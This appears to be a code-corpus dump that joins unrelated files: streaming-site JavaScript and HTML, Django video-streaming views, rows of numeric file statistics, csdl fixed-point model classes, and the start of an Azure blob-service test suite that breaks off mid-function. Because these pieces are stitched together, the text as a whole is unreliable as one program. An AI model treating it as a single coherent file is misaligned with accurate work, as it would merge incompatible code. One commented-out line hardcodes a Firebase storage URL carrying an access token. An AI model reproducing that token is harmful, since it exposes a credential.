// type: 'POST',
// url: '',
// data: formData,
// dataType: 'json',
// enctype: 'multipart/form-data',
// processData: false,
// contentType: false,
// success: function (data) {
// // checking and handling error conditions
// if (data.is_movie_exists != '') {
// movie_fetcherror = data.is_movie_exists;
// } else if (data.is_user_subscribed != '') {
// movie_fetcherror = data.is_user_subscribed;
// } else if (data.is_successful != '') {
// console.log('fetched');
// var byteCharacters = atob(data.stream);
// var byteNumbers = new Array(byteCharacters.length);
// for (let i = 0; i < byteCharacters.length; i++) {
// byteNumbers[i] = byteCharacters.charCodeAt(i);
// }
// // // Show loading animation.
// // var playPromise = video.play();
// // if (playPromise !== undefined) {
// // playPromise.then(_ => {
// // // Automatic playback started!
// // // Show playing UI.
// // })
// // .catch(error => {
// // // Auto-play was prevented
// // // Show paused UI.
// // });
// // }
// // movie_total_duration = data.movie_duration
// var blobArray = [];
// blobArray.push(new Blob([new Uint8Array(byteNumbers)],{'type':'video/mp4'}));
// // var currentTime = video.currentTime;
// var blob = new Blob(blobArray,{'type':'video/mp4'});
// movie_nextpacket_url = window.URL.createObjectURL(blob);
// // video.currentTime = currentTime;
// // movie_previous_time_watched = 0; // if using history add history time
// movie_packet_start_time = movie_maxtime_fetched;
// movie_maxtime_fetched = Math.min(movie_maxtime_fetched + 10, movie_total_duration);
// // $('.progress__filled').css('flex', '0');
// // video.play();
// } else {
// alert('Some unexpected error has occured. Try again.');
// }
// }
// });
// }
// }
// }, 1000);
// // function to set new packet to video tag
// window.setInterval(function(){
// // call your function here
// var video = document.getElementById('movie-video');
// if (video != null) {
// if (movie_packet_start_time == (movie_previous_time_watched + Math.ceil(video.currentTime))) {
// if (movie_fetcherror != '') {
// alert(movie_fetcherror);
// }
// else{
// if (movie_nextpacket_url != '') {
// console.log('setting');
// video.src = movie_nextpacket_url;
// movie_nextpacket_url = '';
// movie_previous_time_watched = movie_packet_start_time;
// video.play();
// console.log('done');
// }
// }
// }
// }
// }, 1000);
<div id="video_with_comments" style="display: none;">
<!-- video running section -->
<div class="runner-section container-fluid">
<div class="row">
<!-- video-player -->
<div class="col-xl-9 col-lg-8 col-md-7 player-wrapper">
<!-- if paid -->
<div class="player" id="video-player">
<!-- video-head -->
<div class="video-head">
<div class="text-white">
<h3 class="font-weight-bold">heading</h4>
</div>
</div>
<!-- video-body -->
<div class="video-body">
<video class="player__video viewer" id="video" preload="metadata">
<source
src=""
id="insert-vid" type="video/mp4">
</video>
</div>
<!-- video-footer -->
<div class="video-footer">
<div class="player__controls" id="plact">
<!-- progress-bar -->
<div class="progress">
<div class="progress__filled"></div>
</div>
<!-- play/pause -->
<button class="player__button toggle" data-toggle="tooltip" title="pause"><i id="play-icon"
class="fas fa-play"></i></button>
<!-- skip 10s backword -->
<button data-skip="-10" class="backword__button" data-toggle="tooltip" title="Skip -10s">«
10s</button>
<!-- skip 10s forward -->
<button data-skip="10" class="forward__button" data-toggle="tooltip" title="Skip 10s">10s
»</button>
<!-- volume -->
<button class="volume__button" data-toggle="tooltip" title="mute" id="volume"><i id="vol-ico"
class="fas fa-volume-up"></i></button>
<input type="range" name="volume" id="vol-ran" class="player__slider" min="0" max="1"
step="0.05" value="1">
<!-- video timer -->
<button id="progressTime" class="timer__button">
<span id="current">00:00 / </span>
<span id="duration">00:00</span>
</button>
<!-- playbackrate -->
<!-- <input type="range" name="playbackRate" class="player__slider" min="0.5" max="2" step="0.1" value="1"> -->
<div class="fullscreen">
<!-- setting -->
<!-- <button id="setting" class="setting__button" data-toggle="tooltip" title="setting"><span
class="px-4"><i id="setting-ico" class="fas fa-cog"></i></span></button> -->
<button type="button" class="prev-button mr-3">
<i class="fas fa-step-backward"></i>
</button>
<button type="button" class="next-button">
<i class="fas fa-step-forward"></i>
</button>
<div class="btn-group dropup">
<button id="setting" class="setting__button" data-toggle="dropdown" aria-haspopup="true"
aria-expanded="false"><span class="px-4"><i id="setting-ico"
class="fas fa-cog"></i></span></button>
<div class="dropdown-menu plbcrt">
<a href="#" class="dropdown-item playbacki dis">Playback speed</a>
<a href="#" class="dropdown-item quali dis">Video Quality</a>
<a href="#" class="dropdown-item shortcuts dis">Keyboard shortcuts</a>
<a href="#" class="dropdown-item playback">0.25</a>
<a href="#" class="dropdown-item playback">0.5</a>
<a href="#" class="dropdown-item playback">1</a>
<a href="#" class="dropdown-item playback">1.25</a>
<a href="#" class="dropdown-item playback">1.5</a>
<a href="#" class="dropdown-item playback">1.75</a>
<a href="#" class="dropdown-item playback">2</a>
<a href="#" class="dropdown-item qual">Auto</a>
<a href="#" class="dropdown-item qual">480p</a>
<a href="#" class="dropdown-item qual">720p</a>
<a href="#" class="dropdown-item qual">1080p</a>
</div>
</div>
<!-- picture-in-picture -->
<button id="pip" class="pip__button" data-toggle="tooltip" title="picture-in-picture"><span
class="px-4"><i id="pip-ico" class="fas fa-window-maximize"></i></span></button>
<!-- theatre view -->
<button class="theatre__button" data-toggle="tooltip" title="theatre mode"><span
class="px-4"><i id="th-ico" class="fas fa-arrows-alt-v"></i></span></button>
<!-- fullscreen -->
<button id="fs" class="fs__button" data-toggle="tooltip" title="fullscreen"><span
class="px-4"><i id="fs-ico" class="fas fa-expand"></i></span></button>
</div>
</div>
</div>
</div>
<!-- else this -->
<!-- pay cost per video -->
<!-- <div class="text-center text-muted text-white">
pay $(number) to watch this video
<button class="btn btn-primary btn-sm" type="button">Pay</button>
</div> -->
</div>
<!-- sidebar content -->
<div class="col-xl-3 col-lg-4 col-md-5 playlist-container" style="background: white;color: black;">
<div class="card comment">
<div class="card-header">
<h4>comments</h4>
</div>
<div class="card-body">
<ul id="vid-comments">
<li>
<div class="row media">
<div class="col-xl-2 col-lg-2 col-md-2 col-sm-2">
<!-- user-profile -->
<img src="/img/img1.png" alt="" class="img-fluid">
</div>
<!-- video-desccription -->
<div class="col-xl-10 col-lg-10 col-md-10 col-sm-10">
<div class="media-body px-1">
<span class="font-weight-bold">
S1 E1 - date
</span>
<div class="d-cent text-justify">
Lorem ipsum dolor sit amet consectetur adipisicing elit.
Distinctio doloribus explicabo enim quae tenetur omnis, optio
dolorem et. Eaque similique obcaecati laborum blanditiis
officiis veniam maxime veritatis alias inventore voluptates!
</div>
<button type="button" class="flg-comm-button px-2" data-toggle="modal"
data-target="#flagCommentCenter">
<i class="fas fa-flag"></i>
</button>
<button type="button" class="show-mr-button">
show
</button>
</div>
</div>
</div>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div class="whole-sect">
<div class="container-fluid">
<div class="row">
<div class="col-xl-9 col-lg-6 col-md-7">
<!-- description flag section -->
<div class="container-fluid descript-sect my-4">
<div class="row">
<div class="col-xl-8 col-lg-8 col-md-8">
<div class="vid-desc text-left pb-3">
<div class="vid-hd py-1" id="video_description_1">
Series name || Season name || Episode name || SNo.ENo || Date
</div>
<div class="vid-cat py-1" id="video_description_2">
Categories || Language || Subcategories || tags
</div>
<div class="vid-des py-1" id="video_description_3">
Description of videos
</div>
</div>
</div>
<div class="col-xl-4 col-lg-6 col-md-4 pb-3">
<div class="flg-sect d-flex flex-row-reverse align-items-end">
<button type="button" class="add-to-fav mx-3" data-toggle="tooltip"
data-placement="bottom" title="Add to favourites">
<span class="ico-cont bg-danger text-center py-2 px-2">
<span class="py-3">
<i class="fas fa-plus"></i>
</span>
</span>
<p class="add-to-fav-title py-3">Favourites</p>
</button>
<button type="button" class="vid-flag mx-3" data-toggle="modal"
data-target="#flagCenter">
<span class="ico-cont bg-danger text-center py-2 px-2">
<span class="py-3">
<i class="fas fa-flag"></i>
</span>
</span>
<p class="add-to-flag py-3">Flag</p>
</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
import requests
def response_iter(url, first_byte):
    """Stream the remote file at `url` starting from byte offset `first_byte`.

    Issues an HTTP Range request and yields the body in 8 KiB chunks so the
    caller (e.g. a StreamingHttpResponse) never holds the whole file in memory.
    """
    ran = 'bytes=' + str(first_byte) + '-'
    headers = {'Range': ran}
    # Use the response as a context manager so the streamed connection is
    # closed even if the consumer stops iterating early (client aborts
    # playback) -- the original leaked the socket in that case.
    with requests.get(url, headers=headers, stream=True) as r:
        for chunk in r.iter_content(chunk_size=8192):
            if chunk:  # filter out keep-alive chunks
                yield chunk
# def file_iterator(file_name, chunk_size=8192, offset=0, length=None):
# with open(file_name, "rb") as f:
# f.seek(offset, os.SEEK_SET)
# remaining = length
# while True:
# bytes_length = chunk_size if remaining is None else min(remaining, chunk_size)
# data = f.read(bytes_length)
# if not data:
# break
# if remaining:
# remaining -= len(data)
# # print(data)
# yield data
from django.views.decorators.http import condition
@condition(etag_func=None)
def stream_video(request, video_obj):
    """Serve a video as a ranged (HTTP 206) streaming response.

    Resolves the stored video record for ``video_obj``, builds its Firebase
    download URL, and streams the requested byte range back so the browser's
    <video> element can seek. Requests without a usable Range header get the
    404 page.
    """
    # Resolve the concrete video row; free videos (type 1) may live in either
    # of two tables, paid series (2) and movies (3) have their own tables.
    video_details = None
    if video_obj.video_type == 1:
        video_details = FreeSeriesVideos.objects.filter(video_id=video_obj).first()
        if video_details is None:
            video_details = FreeMovieVideo.objects.filter(video_id=video_obj).first()
    elif video_obj.video_type == 2:
        video_details = SeriesVideos.objects.filter(video_id=video_obj).first()
    elif video_obj.video_type == 3:
        video_details = MovieVideo.objects.filter(video_id=video_obj).first()
    # Firebase URL for the uploaded video file.
    path_on_cloud = 'videos/' + video_details.firebase_save_name + '.' + VIDEO_EXTENSION_REVERSE[video_details.extension]
    firebase_video_url = storage.child(path_on_cloud).get_url(video_details.firebase_token)
    range_header = request.META.get('HTTP_RANGE', '').strip()
    range_re = re.compile(r'bytes\s*=\s*(\d+)\s*-\s*(\d*)', re.I)
    range_match = range_re.match(range_header)
    # The URL without its query string returns the object's metadata document
    # (which includes the byte size). Parse it as JSON -- never eval() text
    # fetched over the network (arbitrary code execution risk).
    base_url = str(firebase_video_url).split('?')[0]
    details_dict = requests.get(base_url).json()
    size = int(details_dict['size'])
    if range_match:
        first_byte, last_byte = range_match.groups()
        first_byte = int(first_byte) if first_byte else 0
        last_byte = int(last_byte) if last_byte else size - 1
        if last_byte >= size:
            last_byte = size - 1
        length = last_byte - first_byte + 1
        content_type = 'video/mp4'
        resp = StreamingHttpResponse(response_iter(firebase_video_url, first_byte), status=206, content_type=content_type)
        resp['Content-Length'] = str(length)
        resp['Content-Range'] = 'bytes %s-%s/%s' % (first_byte, last_byte, size)
    else:
        return render(request, 'templates/404.html')
    # Advertise range support so the player keeps issuing Range requests.
    resp['accept-ranges'] = 'bytes'
    return resp
def fetch_video(request, video_id):
    """Gate access to a video, then delegate the byte streaming.

    Free videos (type 1) stream for anyone; everything else requires a
    logged-in user holding an unexpired subscription. Every failure path
    falls through to the 404 page.
    """
    video_obj = Videos.objects.filter(video_id=video_id).first()
    if not video_obj:
        return render(request, 'templates/404.html')
    if video_obj.video_type == 1:
        return stream_video(request, video_obj)
    if not request.user.is_authenticated:
        return render(request, 'templates/404.html')
    # Newest still-active subscription plan for the logged-in user, if any.
    active_plan = Subscriptions.objects.filter(user=request.user, end_date__gt=datetime.now(tz=timezone.utc)).order_by('-end_date').first()
    if not active_plan:
        return render(request, 'templates/404.html')
    return stream_video(request, video_obj)
# @csrf_exempt
# def stream_movie(request):
# if request.method == 'POST' and request.user.user_type == 'U':
# # extracting form data coming from ajax request
# json_data = json.loads(request.POST['data'])
# movie_id = json_data['movie_id']
# movie_start_time = json_data['start_time']
# print(movie_start_time)
# # response object to return as response to ajax request
# context = {
# 'is_movie_exists': '',
# 'is_user_subscribed': '',
# 'is_successful': '',
# 'stream': '',
# 'movie_duration': '',
# }
# # checking if movie exists
# movie_details = MovieDetails.objects.filter(movie_id=movie_id).first()
# if movie_details is None:
# context['is_movie_exists'] = 'This movie do not exists'
# else:
# # checking logged in user subscription plan details
# subscribe = Subscriptions.objects.filter(user=request.user, end_date__gt=datetime.now(tz=timezone.utc)).order_by('-end_date').first()
# if subscribe:
# # fetching movie video details for the movie
# movie_video_details = MovieVideo.objects.filter(movie_id=movie_details).first()
# # getting firebase url for uploaded video file
# path_on_cloud = 'videos/' + movie_video_details.firebase_save_name + '.' + VIDEO_EXTENSION_REVERSE[movie_video_details.extension]
# firebase_video_url = storage.child(path_on_cloud).get_url(movie_video_details.firebase_token)
# start_time = movie_start_time
# end_time = start_time + 10
# if end_time > movie_video_details.duration_of_video:
# end_time = movie_video_details.duration_of_video
# extension = str(firebase_video_url).split('?')[0][-3:]
# unique_video_name = str(uuid.uuid4())
# video_fragment_save_path = VIDEO_BASE_FILEPATH + '/' + unique_video_name + '.' + extension
# ffmpeg_extract_subclip("https://firebasestorage.googleapis.com/v0/b/strangeflix-85ae0.appspot.com/o/videos%2Fab783e7c-1bfb-4992-89e3-fa1fcd708936.mp4?alt=media&token=69b4c009-4bf3-4ef7-ad68-faafc91fcd4c", start_time, end_time, targetname=video_fragment_save_path)
# with open(video_fragment_save_path, "rb") as videoFile:
# text = base64.b64encode(videoFile.read()).decode('utf-8')
# # print(text)
# context['stream'] = text
# context['movie_duration'] = movie_video_details.duration_of_video
# os.remove(video_fragment_save_path)
# context['is_successful'] = 'Packet fetched successfully'
# else:
# context['is_user_subscribed'] = 'You are not subscribed to watch this movie. Go buy a subscription plan.'
# return JsonResponse(context)
# else:
# return render(request, 'templates/404.html')
# play movie frontend code
// javascript data object
// var data = {
// 'movie_id': movie_id,
// 'start_time': video.currentTime,
// }
// // adding data to javascript form which is to be send over ajax request
// var formData = new FormData();
// formData.append('data', JSON.stringify(data));
// $.ajax({
// type: 'POST',
// url: '',
// data: formData,
// dataType: 'json',
// enctype: 'multipart/form-data',
// processData: false,
// contentType: false,
// success: function (data) {
// // checking and handling error conditions
// if (data.is_movie_exists != '') {
// alert(data.is_movie_exists);
// } else if (data.is_user_subscribed != '') {
// alert(data.is_user_subscribed);
// } else if (data.is_successful != '') {
// console.log('called');
// var byteCharacters = atob(data.stream);
// var byteNumbers = new Array(byteCharacters.length);
// for (let i = 0; i < byteCharacters.length; i++) {
// byteNumbers[i] = byteCharacters.charCodeAt(i);
// }
// // Show loading animation.
// var playPromise = video.play();
// if (playPromise !== undefined) {
// playPromise.then(_ => {
// // Automatic playback started!
// // Show playing UI.
// })
// .catch(error => {
// // Auto-play was prevented
// // Show paused UI.
// });
// }
// movie_total_duration = data.movie_duration
// var blobArray = [];
// blobArray.push(new Blob([new Uint8Array(byteNumbers)],{'type':'video/mp4'}));
// var currentTime = video.currentTime;
// var blob = new Blob(blobArray,{'type':'video/mp4'});
// video.src = window.URL.createObjectURL(blob);
// video.currentTime = currentTime;
// movie_previous_time_watched = 0; // if using history add history time
// movie_maxtime_fetched = Math.min(currentTime + 10, movie_total_duration);
// $('.progress__filled').css('flex', '0');
// video.play();
// } else {
// alert('Some unexpected error has occured. Try again.');
// }
// }
// });
// HTML CODE FOR VIDEO PLAYER
var playerhtml = '<!-- video running section --><div class="runner-section container-fluid"><div class="row"><!-- video-player --><div class="col-xl-9 col-lg-8 col-md-7 player-wrapper"><!-- if paid --><div class="player" id="movie-video-player"><!-- video-head --><div class="video-head"><div class="text-white"><h3 class="font-weight-bold">movie name</h4></div></div><!-- video-body --><div class="video-body"><video class="player__video viewer" id="movie-video" preload="metadata"><source src="" id="movie-insert-vid" type="video/mp4"></video></div><!-- video-footer --><div class="video-footer"><div class="player__controls" id="movie-plact"><!-- progress-bar --><div class="progress"><div class="progress__filled"></div></div><!-- play/pause --><button class="player__button toggle" data-toggle="tooltip" title="pause"><i id="movie-play-icon" class="fas fa-play"></i></button><!-- skip 10s backword --><button data-skip="-10" class="backword__button" data-toggle="tooltip" title="Skip -10s">«10s</button><!-- skip 10s forward --><button data-skip="10" class="forward__button" data-toggle="tooltip" title="Skip 10s">10s»</button><!-- volume --><button class="volume__button" data-toggle="tooltip" title="mute" id="movie-volume"><i id="movie-vol-ico" class="fas fa-volume-up"></i></button><input type="range" name="volume" id="movie-vol-ran" class="player__slider" min="0" max="1" step="0.05" value="1"><!-- video timer --><button id="movie-progressTime" class="timer__button"><span id="movie-current">00:00 / </span><span id="movie-duration">00:00</span></button><!-- playbackrate --><!-- <input type="range" name="playbackRate" class="player__slider" min="0.5" max="2" step="0.1" value="1"> --><div class="fullscreen"><!-- setting --><!-- <button id="movie-setting" class="setting__button" data-toggle="tooltip" title="setting"><span class="px-4"><i id="movie-setting-ico" class="fas fa-cog"></i></span></button> --><button type="button" class="prev-button mr-3"><i class="fas 
fa-step-backward"></i></button><button type="button" class="next-button"><i class="fas fa-step-forward"></i></button><div class="btn-group dropup"><button id="movie-setting" class="setting__button" data-toggle="dropdown" aria-haspopup="true"aria-expanded="false"><span class="px-4"><i id="movie-setting-ico" class="fas fa-cog"></i></span></button><div class="dropdown-menu plbcrt"><a href="#" class="dropdown-item playbacki dis">Playback speed</a><a href="#" class="dropdown-item quali dis">Video Quality</a><a href="#" class="dropdown-item shortcuts dis">Keyboard shortcuts</a><a href="#" class="dropdown-item playback">0.25</a><a href="#" class="dropdown-item playback">0.5</a><a href="#" class="dropdown-item playback">1</a><a href="#" class="dropdown-item playback">1.25</a><a href="#" class="dropdown-item playback">1.5</a><a href="#" class="dropdown-item playback">1.75</a><a href="#" class="dropdown-item playback">2</a><a href="#" class="dropdown-item qual">Auto</a><a href="#" class="dropdown-item qual">480p</a><a href="#" class="dropdown-item qual">720p</a><a href="#" class="dropdown-item qual">1080p</a></div></div><!-- picture-in-picture --><button id="movie-pip" class="pip__button" data-toggle="tooltip" title="picture-in-picture"><span class="px-4"><i id="movie-pip-ico" class="fas fa-window-maximize"></i></span></button><!-- theatre view --><button class="theatre__button" data-toggle="tooltip" title="theatre mode"><span class="px-4"><i id="movie-th-ico" class="fas fa-arrows-alt-v"></i></span></button><!-- fullscreen --><button id="movie-fs" class="fs__button" data-toggle="tooltip" title="fullscreen"><span class="px-4"><i id="movie-fs-ico" class="fas fa-expand"></i></span></button></div></div></div></div><!-- else this --><!-- pay cost per video --><div class="text-center text-muted text-white">pay $(number) to watch this video <button class="btn btn-primary btn-sm" type="button">Pay</button></div></div><!-- sidebar content --><div class="col-xl-3 col-lg-6 
col-md-5"><div style="background-color: white;color: black;" class="card comment"><div class="card-header"><h4>Comments</h4></div><div class="card-body"><ul id="movie-vid-comments"><li><div class="row media"><div class="col-xl-2 col-lg-2 col-md-2 col-sm-2"><!-- user-profile --><img src="/img/img1.png" alt="" class="img-fluid"></div><!-- video-desccription --><div class="col-xl-10 col-lg-10 col-md-10 col-sm-10"><div class="media-body px-1"><span class="font-weight-bold">S1 E1 - date</span><div class="d-cent text-justify">Lorem ipsum dolor sit amet consectetur adipisicing elit.Distinctio doloribus explicabo enim quae tenetur omnis, optiodolorem et. Eaque similique obcaecati laborum blanditiis officiis veniam maxime veritatis alias inventore voluptates!</div><button type="button" class="flg-comm-button px-2" data-toggle="modal" data-target="#flagCommentCenter"><i class="fas fa-flag"></i></button><button type="button" class="show-mr-button">show</button></div></div></div></li></ul></div></div></div></div></div>';
| 55.675313
| 5,020
| 0.53087
| 6,683
| 62,245
| 4.828071
| 0.118959
| 0.017356
| 0.013017
| 0.02343
| 0.841102
| 0.824459
| 0.80918
| 0.790647
| 0.779396
| 0.771369
| 0
| 0.038242
| 0.324058
| 62,245
| 1,117
| 5,021
| 55.725157
| 0.728502
| 0
| 0
| 0.46841
| 0
| 0.008715
| 0.254647
| 0.062309
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.006536
| null | null | 0.019608
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
14e8a62658af4ef1e8df1a947d96c229d67ee19a
| 1,637
|
py
|
Python
|
csdl/examples/models/fixed_point.py
|
LSDOlab/csdl
|
04c2c5764f6ca9b865ec87ecfeaf6f22ecacc5a3
|
[
"MIT"
] | null | null | null |
csdl/examples/models/fixed_point.py
|
LSDOlab/csdl
|
04c2c5764f6ca9b865ec87ecfeaf6f22ecacc5a3
|
[
"MIT"
] | null | null | null |
csdl/examples/models/fixed_point.py
|
LSDOlab/csdl
|
04c2c5764f6ca9b865ec87ecfeaf6f22ecacc5a3
|
[
"MIT"
] | 1
|
2021-10-04T19:40:32.000Z
|
2021-10-04T19:40:32.000Z
|
from csdl import Model
class FixedPoint1(Model):
    """Residual model r(x) = x - (3 + x - 2*x^2)^(1/4) for fixed-point solves."""
    def initialize(self):
        # The state variable's name is configurable per instance.
        self.parameters.declare('name', types=str)
    def define(self):
        state = self.declare_variable(self.parameters['name'])
        self.register_output('r', state - (3 + state - 2 * state**2)**(1 / 4))
class FixedPoint2(Model):
    """Residual model r(x) = x - ((x + 3 - x^4)/2)^(1/4) for fixed-point solves."""
    def initialize(self):
        # The state variable's name is configurable per instance.
        self.parameters.declare('name', types=str)
    def define(self):
        state = self.declare_variable(self.parameters['name'])
        self.register_output('r', state - ((state + 3 - state**4) / 2)**(1 / 4))
class FixedPoint3(Model):
    """Residual model r(x) = x - 0.5*x (fixed point at x = 0)."""
    def initialize(self):
        # The state variable's name is configurable per instance.
        self.parameters.declare('name', types=str)
    def define(self):
        state = self.declare_variable(self.parameters['name'])
        self.register_output('r', state - 0.5 * state)
class FixedPoint1Expose(Model):
    """FixedPoint1 residual plus an extra exposed output t1 = x^2."""
    def initialize(self):
        # The state variable's name is configurable per instance.
        self.parameters.declare('name', types=str)
    def define(self):
        state = self.declare_variable(self.parameters['name'])
        self.register_output('r', state - (3 + state - 2 * state**2)**(1 / 4))
        self.register_output('t1', state**2)
class FixedPoint2Expose(Model):
    """FixedPoint2 residual plus an extra exposed output t2 = x^2."""
    def initialize(self):
        # The state variable's name is configurable per instance.
        self.parameters.declare('name', types=str)
    def define(self):
        state = self.declare_variable(self.parameters['name'])
        self.register_output('r', state - ((state + 3 - state**4) / 2)**(1 / 4))
        self.register_output('t2', state**2)
class FixedPoint3Expose(Model):
    """Residual r(x) = x - 0.5*x; despite the name, no extra output is registered."""
    def initialize(self):
        # The state variable's name is configurable per instance.
        self.parameters.declare('name', types=str)
    def define(self):
        state = self.declare_variable(self.parameters['name'])
        self.register_output('r', state - 0.5 * state)
| 27.283333
| 72
| 0.602932
| 218
| 1,637
| 4.463303
| 0.151376
| 0.172662
| 0.147996
| 0.135663
| 0.855087
| 0.855087
| 0.818088
| 0.818088
| 0.818088
| 0.818088
| 0
| 0.02692
| 0.228467
| 1,637
| 59
| 73
| 27.745763
| 0.743468
| 0
| 0
| 0.769231
| 0
| 0
| 0.035431
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.307692
| false
| 0
| 0.025641
| 0
| 0.487179
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
090b0157a35a947332527208ab1dd476a79be2ac
| 103
|
py
|
Python
|
backend/src/baserow/contrib/database/airtable/cache.py
|
ashishdhngr/baserow
|
b098678d2165eb7c42930ee24dc6753a3cb520c3
|
[
"MIT"
] | null | null | null |
backend/src/baserow/contrib/database/airtable/cache.py
|
ashishdhngr/baserow
|
b098678d2165eb7c42930ee24dc6753a3cb520c3
|
[
"MIT"
] | null | null | null |
backend/src/baserow/contrib/database/airtable/cache.py
|
ashishdhngr/baserow
|
b098678d2165eb7c42930ee24dc6753a3cb520c3
|
[
"MIT"
] | null | null | null |
def airtable_import_job_progress_key(job_id: int) -> str:
    """Return the cache key under which an Airtable import job reports progress."""
    return "airtable_import_job_progress_{}".format(job_id)
| 34.333333
| 51
| 0.834951
| 17
| 103
| 4.470588
| 0.588235
| 0.368421
| 0.447368
| 0.657895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087379
| 103
| 2
| 52
| 51.5
| 0.808511
| 0
| 0
| 0
| 0
| 0
| 0.359223
| 0.359223
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 1
| 0.5
| 2
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
f5079ab3b6a347497e9ac256bf2ff98d3c639398
| 84,057
|
py
|
Python
|
tests/test_blobservice.py
|
engineyard/azure-sdk-for-python
|
853ebda393ee2118aa88810a2dae5964cb4df612
|
[
"Apache-2.0"
] | null | null | null |
tests/test_blobservice.py
|
engineyard/azure-sdk-for-python
|
853ebda393ee2118aa88810a2dae5964cb4df612
|
[
"Apache-2.0"
] | null | null | null |
tests/test_blobservice.py
|
engineyard/azure-sdk-for-python
|
853ebda393ee2118aa88810a2dae5964cb4df612
|
[
"Apache-2.0"
] | null | null | null |
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
import base64
import datetime
import httplib
import os
import time
import unittest
from azure import (WindowsAzureError,
WindowsAzureConflictError,
BLOB_SERVICE_HOST_BASE,
)
from azure.http import (HTTPRequest,
HTTPResponse,
)
from azure.storage import (AccessPolicy,
BlobBlockList,
BlobResult,
Logging,
Metrics,
PageList,
PageRange,
SignedIdentifier,
SignedIdentifiers,
StorageServiceProperties,
)
from azure.storage.blobservice import BlobService
from azure.storage.storageclient import (AZURE_STORAGE_ACCESS_KEY,
AZURE_STORAGE_ACCOUNT,
EMULATED,
DEV_ACCOUNT_NAME,
DEV_ACCOUNT_KEY,
)
from azure.storage.sharedaccesssignature import (Permission,
SharedAccessSignature,
SharedAccessPolicy,
WebResource,
RESOURCE_BLOB,
RESOURCE_CONTAINER,
SHARED_ACCESS_PERMISSION,
SIGNED_EXPIRY,
SIGNED_IDENTIFIER,
SIGNED_PERMISSION,
SIGNED_RESOURCE,
SIGNED_RESOURCE_TYPE,
SIGNED_SIGNATURE,
SIGNED_START,
)
from util import (AzureTestCase,
credentials,
getUniqueTestRunID,
getUniqueNameBasedOnCurrentTime,
)
#------------------------------------------------------------------------------
class BlobServiceTest(AzureTestCase):
    def setUp(self):
        # Blob client against the live test storage account, credentials come
        # from the shared test configuration.
        self.bc = BlobService(credentials.getStorageServicesName(),
                                  credentials.getStorageServicesKey())
        # Route all requests through the configured (possibly empty) proxy.
        self.bc.set_proxy(credentials.getProxyHost(),
                          credentials.getProxyPort(),
                          credentials.getProxyUser(),
                          credentials.getProxyPassword())
        # Unique container name per test run so parallel/repeated runs don't
        # collide on the shared storage account.
        __uid = getUniqueTestRunID()
        container_base_name = u'mytestcontainer%s' % (__uid)
        self.container_name = getUniqueNameBasedOnCurrentTime(container_base_name)
        # Lease id is recorded so tearDown can release it; extra containers
        # created by individual tests are tracked for deletion too.
        self.container_lease_id = None
        self.additional_container_names = []
    def tearDown(self):
        # Delete everything this test created, then run the base teardown.
        self.cleanup()
        return super(BlobServiceTest, self).tearDown()
def cleanup(self):
if self.container_lease_id:
try:
self.bc.lease_container(self.container_name, 'release', self.container_lease_id)
except: pass
try:
self.bc.delete_container(self.container_name)
except: pass
for name in self.additional_container_names:
try:
self.bc.delete_container(name)
except: pass
#--Helpers-----------------------------------------------------------------
    def _create_container(self, container_name):
        # fail_on_exist=True: raise if the container already exists.
        self.bc.create_container(container_name, None, None, True)
    def _create_container_and_block_blob(self, container_name, blob_name, blob_data):
        # Create the container, then upload blob_data as a block blob.
        self._create_container(container_name)
        resp = self.bc.put_blob(container_name, blob_name, blob_data, 'BlockBlob')
        # put_blob returns None on success.
        self.assertIsNone(resp)
def _create_container_and_page_blob(self, container_name, blob_name, content_length):
self._create_container(container_name)
resp = self.bc.put_blob(self.container_name, blob_name, '', 'PageBlob', x_ms_blob_content_length=str(content_length))
self.assertIsNone(resp)
def _create_container_and_block_blob_with_random_data(self, container_name, blob_name, block_count, block_size):
self._create_container_and_block_blob(container_name, blob_name, '')
block_list = []
for i in range(0, block_count):
block_id = '{0:04d}'.format(i)
block_data = os.urandom(block_size)
self.bc.put_block(container_name, blob_name, block_data, block_id)
block_list.append(block_id)
self.bc.put_block_list(container_name, blob_name, block_list)
def _blob_exists(self, container_name, blob_name):
resp = self.bc.list_blobs(container_name)
for blob in resp:
if blob.name == blob_name:
return True
return False
def _get_permission(self, sas, resource_type, resource_path, permission):
date_format = "%Y-%m-%dT%H:%M:%SZ"
start = datetime.datetime.utcnow() - datetime.timedelta(minutes=1)
expiry = start + datetime.timedelta(hours=1)
sap = SharedAccessPolicy(AccessPolicy(start.strftime(date_format),
expiry.strftime(date_format),
permission))
signed_query = sas.generate_signed_query_string(resource_path,
resource_type,
sap)
return Permission('/' + resource_path, signed_query)
def _get_signed_web_resource(self, sas, resource_type, resource_path, permission):
web_rsrc = WebResource()
web_rsrc.properties[SIGNED_RESOURCE_TYPE] = resource_type
web_rsrc.properties[SHARED_ACCESS_PERMISSION] = permission
